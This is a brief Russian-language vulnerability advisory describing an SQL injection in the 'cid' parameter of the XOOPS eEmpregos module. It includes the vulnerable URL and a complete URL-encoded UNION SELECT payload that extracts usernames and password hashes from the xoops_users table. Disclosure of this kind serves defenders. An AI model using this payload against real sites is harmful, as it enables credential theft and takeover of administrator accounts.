Программа: XOOPS Module eEmpregos

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://xxxx/modules/eEmpregos/index.php?pa=view&cid=[exploit]

EXPLOIT:

00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/* */from%2F%2A%2A%2Fxoops_users/*/*where%20admin%201=%202



Оставить мнение